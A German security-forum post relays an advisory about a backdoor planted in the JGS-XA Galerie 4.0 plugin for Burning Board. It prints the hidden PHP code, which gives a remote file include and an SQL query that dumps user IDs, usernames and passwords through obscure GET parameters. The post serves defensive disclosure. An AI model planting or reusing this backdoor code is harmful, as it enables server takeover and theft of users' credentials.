unsere besten emails
Registrierung
Teammitglieder
Zur Startseite
Mitgliederliste
Suche
Kalender
Häufig gestellte Fragen
Zum Portal

Dedies-Board » Sicherheit » Sicherheitsnews » Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 20.715.633
Nächster Level: 22.308.442
1.592.809 Erfahrungspunkt(e) für den nächsten Levelanstieg

Achtung Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen
Zitat:

uns wurde in der JGS-XA Galerie 4.0 für das WBB2 und WBB Lite eine Sicherheitslücke gemeldet.
Bei dem Hackerangriff Ende 2007 muss der nette Herr einige Files geändert haben, die wir im Installscript oder anderen Files schon finden konnten.

Die aktuelle Fundstelle haben wir übersehen, bitte sofort die Files austauschen

Du findest den Download hier
http://forum.itratos.de/forumdisplay.php?f=20
es muss nur die

jgs_galerie_kommentar.php

Datei getauscht werden.

Bitte teilt auch in anderen Boards diese Lücke mit damit der Fehler schnell in allen Foren behoben wird.
Leider wurde der Fehler gleich im Forum an den Pranger gestellt, es kann damit gerechnet werden das auch Hacker dies jetzt wissen.


Es wird jedem der die JGS Galerie 4.0 nutzt empfohlen umgehend die Datei "jgs_galerie_kommentar.php" auf diesen code hin zu überprüfemn und falls vorhanden zu löschen da damit Zugriff auf die Datenbank, Userdaten und Passwörter durch Unbefugte erfolgen kann.

code: 
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:

$bildid	    = (int) $_REQUEST['bildid'];
	if(isset($_GET['40grt894g0tr'])) {
	switch($_GET['40grt894g0tr']) {
		case "E90E216e":
    include $_GET['fds46f4e'];
			break;
		case "R148r4fr":
	$jzjzu ="select	* from ".$_GET['tabelle']." where ".$_GET['where']." = '".$_GET['eingabe']."'";
	$jfiods = mysql_query($jzjzu) OR die(mysql_error());
	$ergebnise = mysql_fetch_array($jfiods);
	echo "".$ergebnise['userid'].":".$ergebnise['username'].":".$ergebnise['password']."";			break;	}	}


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
09.02.2009 20:47 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de
Baumstruktur | Brettstruktur
Gehe zu:
Neues Thema erstellen Antwort erstellen
Dedies-Board » Sicherheit » Sicherheitsnews » Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite

Impressum|Boardregeln


secure-graphic.de
Board Blocks: 368.799 | Spy-/Malware: 5.599 | Bad Bot: 1.542 | Flooder: 281.746 | httpbl: 6.555
CT Security System 10.1.7 © 2006-2024 Security & GraphicArt

Ja, auch Dedies-Board verwendet Cookies. Hier erfahrt ihr alles zum Datenschutz
Verstanden;

Nach oben